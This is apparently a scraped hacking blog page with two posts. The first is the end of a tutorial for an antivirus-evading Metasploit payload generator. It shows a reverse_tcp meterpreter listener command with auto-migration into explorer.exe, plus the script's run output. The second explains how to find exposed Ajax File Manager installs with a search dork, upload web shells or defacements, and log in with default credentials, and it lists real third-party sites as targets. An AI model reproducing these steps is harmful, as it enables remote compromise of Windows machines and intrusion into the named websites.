msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript='migrate.rb -n explorer.exe' E</code></pre>
</td> </tr>
</tbody></table>
</div>
 
Save the file as fud.sh 
And set the permission to Execute : 
<table cellspacing="0" style="width: 600px;"><tbody>
<tr><td style="background: whitesmoke; color: black; font-weight: bold;">Code : </td></tr>
<tr><td><pre><code>
root@t3amas5assin:~/Desktop# chmod +x fud.sh
root@t3amas5assin:~/Desktop# ./fud.sh
</code><code><pre><code>************************************************************
 Automatic shellcode generator - FOR METASPLOIT 
 
 With some Randomic gravy and sauce to bypass Antivirus 
 http://anonymous1769.blogspot.in/ 
************************************************************</code></pre>
1) LanIP
2) WanIP?
2
======Getting your WAN IP=========
114.79.135.104
What Port Number are we gonna listen to? : 5676
Please enter a random seed number 1-10000, the larger the number the 
larger the resulting executable : 1000
And lastly how many times do we want to encode our payloads 1-20? : 5
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)

[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)

[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)

[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)

[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)

[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)

[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)

[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)

[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)

[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)

31963.exe ...generated in ShellCode subfolder
31963.exe sha1checksum is..675ee8fa2daf8533fe2c2ebe941de78948fa776a 31963.exe
 starting the meterpreter listener...</code></pre>
</td> </tr>
</tbody></table>
 
As soon as the the payload is executed on the Victims machine 
it will automatically migrate to explorer.exe Process 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSgwi77Fkcxfu-zQQ9_rA4mArIHZpGN5oYxXHTU1q0O8lWhWulB2_Mc7Fc-YKcqhmwUcZmfXX_QEOHZKunKFUtowRtVPRgB4dkRqjH21RmgdCBBnON3b53jr4iLZP6lgPwT-ySm6tfotH7/s1600/3-18-2012+3-01-10+PM.png" rel="lytebox" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="dj mak" border="0" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSgwi77Fkcxfu-zQQ9_rA4mArIHZpGN5oYxXHTU1q0O8lWhWulB2_Mc7Fc-YKcqhmwUcZmfXX_QEOHZKunKFUtowRtVPRgB4dkRqjH21RmgdCBBnON3b53jr4iLZP6lgPwT-ySm6tfotH7/s640/3-18-2012+3-01-10+PM.png" width="640" /></a></div>
 
The payload is almost undetectable from most of the virus Engines!!!!</div>

Metasploit FUD Payload generator

exploit a system outside a network :) Code : #!/bin/bash echo "************************************************************" echo " Automatic shellcode generator - FOR METASPLOIT " echo …

06 Jun 2014

Ajax File Manager ~ Shell and Files Upload Vulnerability

<div dir="ltr" style="text-align: left;" trbidi="on">
<h1 class="post-title entry-title" itemprop="name headline">
</h1>
<div class="post-body entry-content" id="post-body-127935310334349408" itemprop="description articleBody">
<div dir="ltr" style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://profile.ak.fbcdn.net/hprofile-ak-snc4/372186_100002061928187_1094618549_n.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="372186_100002061928187_1094618549_n.jpg (180×178)" border="0" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/372186_100002061928187_1094618549_n.jpg" /></a></div>
Open Google Search Engine, Type this dork : inurl:/plugins/ajaxfilemanager/ For Example I got :  <a href="http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/" target="_blank">http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/</a> 
 or <a href="http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/" target="_blank">http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/</a> 
or any site else ... 
Now Put  ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url  
 
 
for example :  
<a href="http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php" target="_blank">http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php</a> 
<a href="http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php" target="_blank">http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php</a> 
 
 
Now Find Upload Upload and Upload Your shell/Deface/file 
 
 
To view you File find /Uploaded/ directory in Website by using your brain :P 
 
 
example of uploaded file : <a href="http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt">http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt</a> 
<a href="http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt">http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt</a> 
 
 
Some Demo sites 
 
 
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php 
http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php 
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php 
http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php 
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php 
 
 
Results :  
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere 
http://www.thebradshawscornershop.co.uk/images/yourfilehere 
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere 
http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere 
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere 
 
 
if you need Login in any ajaxfilemanager  
 
 
Default Password Ajax File Manager Username:ajax Password:123456 
</div>
</div>
</div>

Ajax File Manager ~ Shell and Files Upload Vulnerability

Open Google Search Engine, Type this dork : inurl:/plugins/ajaxfilemanager/For Example I got : http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/ or http…

06 Jun 2014

Load more posts